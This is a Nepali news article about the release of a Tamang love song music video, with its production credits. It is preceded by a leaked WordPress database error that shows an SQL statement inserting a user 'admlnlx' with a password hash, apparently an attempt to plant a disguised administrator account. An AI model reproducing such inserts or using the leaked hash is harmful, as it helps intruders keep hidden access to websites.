WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8mJckbS2ZJ2StBuBGTjQhYE5t.Gyf.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:26:32', '', 'admlnlx', 'admlnlx')
गाउँले न्युज -काठमाडौं, तामाङ साङ्गीतीक क्षेत्र प्रेम मय भईरहेको यो माहोलमा पुन अर्काे धमाकेदार तामाङ प्रेम गितको प्रवेश भएको छ ।
काठमाण्डौको वौद्धमा तामाङ चलचित्र संघका अध्यक्ष तथा समाजसेवी बिकु थोकरको प्रमुख आतिथ्यतामा तामाङ प्रेम गीत एला मिला ङ्याल्मोको म्युजीक भिडियो सार्वजनीक कार्यक्रम सम्पन्न भएको हो । चोखो मायाको उदाहरण वनेर देखाउने गीतको संदेश रहेको छ ।
सार्वजनीक गीतमा लनम लामको शब्द, निमा दोङको संगीत तथा लनम लामा र जीतु लोप्चनको आवाज रहेको छ । दिपेश प्रधानको एरेन्ज तथा मिक्सिङ रहेको यस गीतलाई दिप स्टुडियोमा रेकर्ड गरिएको छ । अजय लामाको सम्पादन, निर्देशन तथा कोरीयोग्रफी रहेको यस म्युजिक भिडियोमा हिरालाल तामाङ र शुष्मा मोक्तानको प्रमुख अभिनय रहेको छ । विक्रम मोक्तानको सिनेमाटोग्राफी तथा ड्रोन, दिपेन्द्र हमालको मेकअप, शिव शिग्देलको लाईट, कुङुवो प्रोडक्सनको डिजाईन रहेको यस म्युजीक भिडियो ल्हाप्साङकार्पाे म्युजीक प्रालीका् अफीसियल युट्युव च्यानल मार्फत सार्वजनकि गरिएको छ ।